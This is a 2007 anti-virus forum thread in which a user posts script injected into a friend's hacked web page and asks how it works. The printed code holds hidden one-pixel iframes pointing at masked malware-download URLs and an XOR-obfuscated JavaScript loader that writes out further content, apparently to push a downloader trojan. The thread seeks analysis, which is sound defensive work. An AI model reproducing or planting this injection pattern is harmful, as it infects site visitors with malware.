site hacked - can anyone de-code this?

site hacked - can anyone de-code this?
Secure Home | Search | About
Login Password
Register Now! Lost Password?
 Anti-Virus Software    Post an article   get this group's latest topics as an RSS feed add this group's latest topics to your My MSN content add this group's latest topics to your My Yahoo content add this group's latest topics to your Google content
Subject Author Date
site hacked - can anyone de-code this? Disraeli 05-05-2007
Posted by Disraeli on May 5, 2007, 4:51 pm
If you were  Registered and logged in, you could reply and use other advanced thread options
a friend of mine had his web server hacked and his webpage contained the
following script that seemed to trigger off a "downloader trojan" warning
when I inadvertantly opened the page in my browser.

i'm not up on scripting, so would appreciate anyone could tell me how this
thing works, or if it left any trace of 'whodunnit'...? :)

thanks for any help


(WARNING: those links may still be live trojans,
don't visit those sites unless you're protected)

==============BEGIN CODE ===========

<iframe src="http://removethisline/dl/adv407.php" width=1 height=1></iframe>
<br>
<br>
<iframe src='http://removethisline/strong/167/' width=1 height=1></iframe>
<iframe src='http://removethisline/adv/new.php?adv=167' width=1
height=1></iframe>
<script language="JavaScript">e = '0x00' + '5F';str1 =
"%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7
%BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1%
F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF%C
0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2";s
tr=tmp='';for(i=0;i<str1.length;i+=3){tmp =
unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e
)-127);}document.write(str);</script>

=================END OF CODE===============




Posted by Mr. Arnold on May 5, 2007, 6:37 pm
If you were  Registered and logged in, you could reply and use other advanced thread options

>a friend of mine had his web server hacked and his webpage contained the
> following script that seemed to trigger off a "downloader trojan" warning
> when I inadvertantly opened the page in my browser.
>
> i'm not up on scripting, so would appreciate anyone could tell me how this
> thing works, or if it left any trace of 'whodunnit'...? :)
>
> thanks for any help

Why bother? All that's going to happen is the site is going to get hacked
again, because the Web server, file system, user accounts, the registry and
the O/S are not secured.


Similar ThreadsPosted
How to decode Java code safely? February 10, 2006, 10:42 am
Has my computer been hacked? May 13, 2006, 4:51 pm
OT - eBay hacked again? September 25, 2007, 9:21 pm
symantec corporate edition hacked May 26, 2006, 7:45 am
Antihacking firm hacked !!!!! VERY FUNNY... and troublesome at the same time ! : February 8, 2008, 10:13 am
NAI site down? September 6, 2005, 3:27 pm
New Tech Site November 22, 2005, 3:10 pm
NOD32 Web Site April 15, 2006, 2:11 pm
Errors on the gnu web site May 19, 2006, 12:31 pm
Site Advisor. May 27, 2006, 11:28 pm

The site map in XML format XML site map

Contact Us | Privacy Policy